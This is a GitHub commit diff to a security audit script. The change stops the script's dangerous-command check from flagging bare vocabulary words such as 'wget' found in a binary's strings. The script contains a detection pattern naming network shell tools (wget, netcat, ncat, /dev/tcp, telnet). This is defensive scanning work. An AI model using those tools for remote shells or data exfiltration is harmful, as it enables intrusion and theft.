Skip to content

Commit 3f7f7ee

Browse files
committed
Fix binary string audit: exclude bare token vocabulary matches
The embedded Nomic code token vocabulary (40K tokens) includes words like "wget" as code tokens. Filter out bare single-word matches (2-10 lowercase chars) since real dangerous strings appear in command context, not as standalone vocabulary entries.
1 parent 74099d8 commit 3f7f7ee

File tree

1 file changed

+4
-1
lines changed

1 file changed

+4
-1
lines changed

scripts/security-strings.sh

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -97,7 +97,10 @@ echo ""
9797
echo "--- Dangerous command detection ---"
9898

9999
DANGEROUS_CMDS='wget|netcat|ncat|/dev/tcp|telnet'
100-
if grep -wE "$DANGEROUS_CMDS" "$STRINGS_FILE" > "$SEC_CMDS" 2>/dev/null; then
100+
# Filter out bare single-word matches from the embedded token vocabulary
101+
# (vendored/nomic/code_tokens.h contains 40K code tokens including "wget").
102+
# Real dangerous strings would appear in a command context, not as standalone words.
103+
if grep -wE "$DANGEROUS_CMDS" "$STRINGS_FILE" | grep -vxE '[a-z]{2,10}' > "$SEC_CMDS" 2>/dev/null && [ -s "$SEC_CMDS" ]; then
101104
echo "BLOCKED: Dangerous commands found in binary:"
102105
cat "$SEC_CMDS"
103106
FAIL=1

0 commit comments

Comments
 (0)